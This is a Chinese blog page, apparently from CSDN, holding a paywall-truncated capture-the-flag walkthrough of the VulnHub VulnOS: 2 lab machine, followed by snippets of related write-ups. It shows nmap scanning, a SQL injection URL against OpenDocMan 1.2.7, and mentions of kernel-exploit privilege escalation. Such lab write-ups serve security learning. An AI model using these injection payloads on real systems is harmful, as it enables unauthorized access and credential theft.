vulnhub VulnOS: 2

最新推荐文章于 2025-02-18 22:01:59 发布
原创 最新推荐文章于 2025-02-18 22:01:59 发布 · 2.8k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#postgresql #靶机 #vulnhub #渗透测试 #hydra

本文详述了一次渗透测试的过程,从nmap端口扫描开始,发现了OpenDocMan v1.2.7的SQL注入漏洞,利用此漏洞获取了Webmin用户的密码,并通过SSH登录。接着尝试内核版本漏洞提权或通过爆破PostgreSQL获取额外用户权限,最终获得了root用户密码,实现了系统完全控制。

本文思路:

nmap端口扫描-->访问网站搜集信息-->利用OpenDocMan v1.2.7的sql注入漏洞获取webmin用户的密码-->webmin用户ssh登录搜集信息-->利用内核版本漏洞提权(或者 爆破postgresql用户名密码-->postgresql中获得vulnosadmin的密码-->通过vulnosadmin用户目录下的r00t.blend文件获得root用户密码)

具体步骤:

前置步骤:arp-scan扫描得到靶机ip

攻击机中输入

sudo arp-scan -l

扫描到同网段ip,根据靶机MAC地址,可知本靶机ip为192.168.101.27

步骤1:nmap端口扫描

攻击机上输入以下命令,对靶机进行TCP全端口的扫描

sudo nmap -sS -A -p- 192.168.101.27

扫描出开放端口22(ssh),80(http),6667(irc,这个有点神奇,不知道后面会不会用到)

步骤2:登录网页收集信息

浏览器访问:http://192.168.101.27/

进来之后是这样的提示通过渗透website获取root权限和flag

点击上图的website,来到​ http://192.168.101.27/jabc/​

在这个站点四处逛逛,最后来到了documentation页面:​http://192.168.101.27/jabc/?q=node/7

啥也没有,就有点诡异

右键 查看页面源代码,发现隐藏的提示

根据上图中的提示访问: http://192.168.101.27/jabcd0cs/

用户名和密码都是guest

在这个站点也翻了一遍没发现啥特有用的,但注意到网站是用OpenDocMan v1.2.7创建的。

在exploit-db中查找OpenDocMan,找到一条版本符合的

OpenDocMan 1.2.7 - Multiple Vulnerabilities - PHP webapps Exploithttps://www.exploit-db.com/exploits/32075里面记录了两个问题,一个是sql注入,由于我们现在是guest用户,可能可以利用这个获得管理员账户和密码;第二个是通过访问控制漏洞使当前用户获取管理员权限,我没用这个方法,但有小伙伴用这个方法也成功了。

步骤3:利用sql注入获取管理员账户和密码

那就试试sql注入吧:

浏览器访问如下url,获得当前数据库名称(其实这步没啥必要)

http://192.168.101.27/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,database(),3,4,5,6,7,8,9

 浏览器访问如下url,获得当前数据库所有表名称


                

        

    


  


        

            

                      
                        最低0.47元/天 解锁文章
                          
                      
            

        


    



                



	

		

			

				
					
Vulnhub靶机 VULNOS: 2 writeup

				
			

			

				

					xingjinhao123的博客
				

				

					02-10
					
					3160
					
				

			

		

		

			
				
下载地址:https://www.vulnhub.com/entry/vulnos-2,147/

信息搜集
获取IP地址

扫描端口

80端口

点击website跳转到/jabc

在 jabc/?q=node/7 页面看起来啥也没有,但是Ctrl+A全选之后看到提示还有一个目录 /jabcd0cs/


访问/jabcd0cs/

在/jabcd0cs/发现CMS的版本,使用searchsploit查询


这里看到了pyload
http://[host]/ajax_udf.php?q=1&amp

			
		

	



                

            
              



	

		

			

				
					
【每日打靶练习】Vulnhub靶机平台-tomato

				
			

			

				

					leo788的博客
				

				

					12-30
					
					1776
					
				

			

		

		

			
				
在网页的下边找到包含内容,通过返回信息中的用户属性得到信息:root用户可以执行shell,下方的tomato用户也可以执行shell,继续。尝试ssh连接,这里使用错误的用户名和错误的密码,输入三次后,写入日志中,检查一下log,成功获取到日志信息,可通过修改ruser来进行注入。刷新日志进行查看,发现注入未显示,证明注入成功,木马被作为代码执行,若显示则失败,代码木马作为文本执行。包含失败,这里未开放远程包含,同时本地包含文件无可再利用—》转换思路。执行后的匹配到相应漏洞,选择可能性高的来试一下。

			
		

	



              


  
  
              

                


	

		

			

				
					
Vulnhub靶机Funbox:1 writeup

				
			

			

				

					xingjinhao123的博客
				

				

					01-11
					
					1629
					
				

			

		

		

			
				
下载地址:https://www.vulnhub.com/entry/funbox-1,518/

信息搜集
获取IP地址

扫描端口

这里看到一共开放了四个端口21:ftp,22:ssh,88:http,3306:mysql
21端口
登录ftp的时候需要用户名密码,先放着

80端口
访问80端口发现会跳转到funbox.fritz.box

修改hosts为:

再次访问80端口

这里看到使用了wordpress管理系统

可以使用wpscan尝试枚举下用户和插件:
wpscan --url ht

			
		

	





	

		

			

				
					
14-vulnhub-VulnOS2

				
			

			

				

					尼德霍格007
				

				

					08-05
					
					272
					
				

			

		

		

			
				
vulnhub-VulnOS: 2
靶机地址:https://www.vulnhub.com/entry/vulnos-2,147/
目标:得到root权限&找到flag.txt
作者:尼德霍格007
时间:2021-8-5
一、信息收集
nmap扫描ip地址
nmap -sP 10.0.2.0/24


扫描到靶机地址是10.0.2.4
扫描端口
nmap -A -p 1-60000  10.2.0.4


看到他开放了这几个端口
先访问一下80端口web服务,发现了另一个链接,点开

前三个模块

			
		

	



		

			
		



	

		

			

				
					
VulnHub靶场-VulnOS:2

				
			

			

				

					2302_78903258的博客
				

				

					08-10
					
					1640
					
				

			

		

		

			
				
刚开始还以为6667端口能够进行漏洞利用,但是后面发现利用不了,转成探测网站的漏洞。对于探测网站的漏洞,我们要注意它的网页源代码查看提示,查找相关的漏洞进行exp的下载,这里考虑到的是sql注入的漏洞,我们用sqlmap爆破即可,基本权限提升套路都是:下载exp-->>上传exp-->>编译-->>执行。

			
		

	





	

		

			

				
					
复现渗透Vulnhub-VulnOSv2靶机

				
			

			

				

					C-HOWE的博客
				

				

					01-07
					
					794
					
				

			

		

		

			
				
本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列VulnOSv2靶机有一定的了解。

			
		

	





	

		

			

				
					
Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权

				
			

			

				

					YouthBelief的博客
				

				

					12-05
					
					2587
					
				

			

		

		

			
				
VulnOSv2 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘web思路步骤一:枚举目录+主页挖掘步骤二:OpenDocMan v1.2.7 cms利用步骤三:尝试利用账号面ssh连接webmin0x03 提权步骤四:内核漏洞提权0x04 总结
0x00 环境搭建

VritualBox配置网络为 host-only
VMware中kali加入 host-only  为Virtual Box的网卡
开启虚拟机报错 usb 2.0 什么的问题
修改usb设备为1.0

0x01 信息

			
		

	





	

		

			

				
					
VulnHub靶机-VulnOs-2

				
			

			

				

					Slow_的博客
				

				

					02-24
					
					880
					
				

			

		

		

			
				
VulnHub靶机-VulnOs-2
下载地址:https://www.vulnhub.com/entry/vulnos-2,147/
下载靶机后在VirtualBox下打开,网卡配置为桥接
任务:提权并获取flag
攻击机:kali linux 192.168.8.108
靶机:192.168.8.107
文章目录VulnHub靶机-VulnOs-2一、信息搜集一、pandas是什么?二、使用步骤1.引入库2.读入数据总结
一、信息搜集
首先nmap探测存活靶机
命令:nmap -sP 192.168.8

			
		

	





	

		

			

				
					
Vulnhub靶机VulnOS2

				
			

			

				

					qq_48904485的博客
				

				

					03-20
					
					656
					
				

			

		

		

			
				
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机VulnOS: 2(10.0.2.14)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/vulnos-2,147/

			
		

	





	

		

			

				
					
Vulnhub-靶机-VulnOSv2

				
			

			

				

					qq_43264813的博客
				

				

					03-01
					
					664
					
				

			

		

		

			
				
Vulnhub靶机—Kioptrix: Level 1 (#1)
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
文章目录Vulnhub靶机—Kioptrix: Level 1 (#1)一、信息收集二、漏洞利用三、Flag
一、信息收集
【步骤一】使用nmap确定目标靶机地址:
【命令】nmap -sP 192.168.43.0/24

【步骤二】对目标靶机进行全端口扫描:
【命令】nmap -n -sC -sV -p- 192.1

			
		

	





	

		

			

				
					
vulnhub-VULNOS: 2渗透测试靶场

				
			

			

				

					shulao2010的博客
				

				

					05-29
					
					279
					
				

			

		

		

			
				
分析如何利用SQL注入漏洞最后拿到root权限

			
		

	





	

		

			

				
					
No.14-VulnHub-VulnOS: 2-Walkthrough渗透学习

				
			

			

				

					qq_34801745的博客
				

				

					01-11
					
					1245
					
				

			

		

		

			
				
**
VulnHub-VulnOS: 2-Walkthrough
**
靶机地址:https://www.vulnhub.com/entry/vulnos-2,147/
靶机难度:中级(CTF)
靶机发布日期:2016年5月17日
靶机描述:VulnOS是打包为虚拟映像的一系列易受攻击的操作系统,以增强渗透测试技能
这是版本2-
体积更小,更少混乱!
由于时间并不总是在我身边,因此花了很长时间创建...

			
		

	





	

		

			

				
					
VulnOS:2靶机练习

					
最新发布

				
			

			

				

					Blanks的博客
				

				

					02-18
					
					892
					
				

			

		

		

			
				
带你去体验最真实的渗透环境,文章里不会直接摆答案,会全面的带你去进行信息收集以及漏洞利用,会领着你一步一步踩下我踩过的坑,实战往往比这更绝望,练技术须实践。

			
		

	





	

		

			

				
					
vulnhub靶场vulnosv2靶场

				
			

			

				

					zzzzzzkeai的博客
				

				

					12-08
					
					322
					
				

			

		

		

			
				
vulnhub靶场--vulnosv2靶场

			
		

	





	

		

			

				
					
渗透测试靶机----VulnOsv2

				
			

			

				

					久恙502的博客
				

				

					01-29
					
					521
					
				

			

		

		

			
				
渗透测试,打靶经历记录,大佬多多指点,谢谢!!!

			
		

	





	

		

			

				
					
Vulnhub系列:VulnOSv2

				
			

			

				

					Ays.Ie的博客
				

				

					03-05
					
					553
					
				

			

		

		

			
				
继续更新vulnhub靶机,巩固渗透技术,分享做题思路,打开思维局限

			
		

	





	

		

			

				
					
Vulnosv2 靶机训练

				
			

			

				

					weixin_43999483的博客
				

				

					03-02
					
					303
					
				

			

		

		

			
				
参考博客传送门
关键点:web系统可能在msf中保留有漏洞记录,找到相对应的版本攻击点进行攻击
searchsploit OpenDocMan 1.2.7

一般存放目录都放在
/usr/share/exploitdb下面

获得低权限用户后 可以考虑Linux内核提权
searchsploit Linux 3.13.0

搭建一个文件服务器
python -m SimpleHTTPServer 6666

下载
wget http://xxx.xxx.xxx.xxx

如果是c类型文件,需要gcc编译
找

			
		

	





	

		

			

				
					
VulnOSv2靶场渗透】

				
			

			

				

					一纸荒芜的博客
				

				

					12-29
					
					706
					
				

			

		

		

			
				
VulnOSv2靶场渗透

			
		

	





	

		

			

				
					
2021年1月20日-NO15-Vulnhub-VulnOS2 渗透学习

				
			

			

				

					AnonyMousIT的博客
				

				

					01-20
					
					316
					
				

			

		

		

			
				
2021年1月20日-NO:15-Vulnhub-VulnOS:2 渗透学习
一、简介
靶机地址:https://www.vulnhub.com/entry/vulnos-2,147/
kali地址:192.168.56.105
靶机IP地址:192.168.56.104
主要利用sql注入漏洞,和linux系统漏洞
二、信息收集


开放着80,22,6667端口
访问web页面

点击 website 会出现

Documentation页面发现隐藏的文字

发现jabcd0cs页面
访问该页面试试



			
		

	





	

		

			

				
					
vulnhub Leeroy: 1

				
			

			

				

					01-06
				

			

		

		

			
				
通常情况下,该页面会包含有关此 VM 的描述、目标、难度级别以及其他重要提示信息[^2]。  对于具体的下载过程:  - 浏览至 [VulnHub](https://www.vulnhub.com/) 主页; - 使用顶部导航条中的搜索框查询关键词 ...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 6

	

  

	
    

      

      

      

        
        

          
          

            

              成就一亿技术人!
            

            

              拼手气红包6.0元
            

          

        

        

          

            还能输入1000个字符
          

          

             
          

          

            

              红包
              添加红包
            

            

              表情包
              插入表情
              

                

              

            

            

              表情包
              代码片
              

                
              

            

            

              
              
              
              
              
              
              
            

          

        

      

    

		

			

			

			
			

					 条评论被折叠 查看
			

			

				
			

		

	

	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值